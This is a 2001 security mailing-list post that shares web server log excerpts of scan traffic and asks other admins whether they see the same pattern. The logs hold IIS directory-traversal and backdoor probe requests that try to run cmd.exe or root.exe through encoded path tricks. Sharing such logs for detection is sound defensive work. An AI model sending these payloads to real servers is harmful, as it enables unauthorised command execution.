something new afoot, sweeping scans:

Ron DuFresne Tue, 18 Sep 2001 08:48:09 -0700


Folks,

Someone mentioned seeing similiar signatures in their logs earlier today
to the signatures we are seeing in dramtic rapidity in a short time span.
Are other sites seeing similiar signatures <quick greps attached and
posted below>  Has a new toy been unleshed, or is this an old toy we have 
not seen the signature for before:

208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 
404 210
208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 
404 210
208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 
404 208
208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 
404 208
208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
 HTTP/1.0" 404 265
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
 HTTP/1.0" 404 265
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:49:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 
404 210
208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 
404 208
208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:49:44 -0400] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
 HTTP/1.0" 404 265
208.1.131.11 - - [18/Sep/2001:10:49:46 -0400] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:48 -0400] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:49:50 -0400] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:49:51 -0400] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232



Thanks,


Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.

208.1.206.226 - - [18/Sep/2001:11:35:51 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 
404 210
208.1.206.226 - - [18/Sep/2001:11:35:56 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 
404 208
208.1.206.226 - - [18/Sep/2001:11:35:58 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.1.206.226 - - [18/Sep/2001:11:35:59 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.1.206.226 - - [18/Sep/2001:11:36:00 -0400] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.206.226 - - [18/Sep/2001:11:36:00 -0400] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 
249
208.1.206.226 - - [18/Sep/2001:11:36:01 -0400] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 
249
208.1.206.226 - - [18/Sep/2001:11:36:02 -0400] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
 HTTP/1.0" 404 265
208.1.206.226 - - [18/Sep/2001:11:36:03 -0400] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.206.226 - - [18/Sep/2001:11:36:10 -0400] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.206.226 - - [18/Sep/2001:11:36:11 -0400] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.206.226 - - [18/Sep/2001:11:36:12 -0400] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.206.226 - - [18/Sep/2001:11:36:16 -0400] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.206.226 - - [18/Sep/2001:11:36:26 -0400] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.206.226 - - [18/Sep/2001:11:36:27 -0400] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.206.226 - - [18/Sep/2001:11:36:28 -0400] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232

208.33.26.44 - - [18/Sep/2001:11:28:52 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 
404 210
208.33.26.44 - - [18/Sep/2001:11:28:52 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 
404 208
208.33.26.44 - - [18/Sep/2001:11:28:56 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.33.26.44 - - [18/Sep/2001:11:28:57 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.33.26.44 - - [18/Sep/2001:11:28:58 -0400] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.33.26.44 - - [18/Sep/2001:11:28:59 -0400] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 
249
208.33.26.44 - - [18/Sep/2001:11:28:59 -0400] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 
249
208.33.26.44 - - [18/Sep/2001:11:29:00 -0400] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
 HTTP/1.0" 404 265
208.33.26.44 - - [18/Sep/2001:11:29:01 -0400] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.33.26.44 - - [18/Sep/2001:11:29:02 -0400] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.33.26.44 - - [18/Sep/2001:11:29:02 -0400] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.33.26.44 - - [18/Sep/2001:11:29:03 -0400] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.33.26.44 - - [18/Sep/2001:11:29:04 -0400] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.33.26.44 - - [18/Sep/2001:11:29:05 -0400] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.33.26.44 - - [18/Sep/2001:11:29:06 -0400] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.33.26.44 - - [18/Sep/2001:11:29:06 -0400] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232

208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 
404 210
208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 
404 210
208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 
404 208
208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 
404 208
208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 
249
208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 
249
208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 
249
208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 
249
208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
 HTTP/1.0" 404 265
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
 HTTP/1.0" 404 265
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:49:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 
404 210
208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 
404 208
208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:49:44 -0400] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 
249
208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 
249
208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
 HTTP/1.0" 404 265
208.1.131.11 - - [18/Sep/2001:10:49:46 -0400] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:48 -0400] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:49:50 -0400] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:49:51 -0400] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232

something new afoot, sweeping scans:

Reply via email to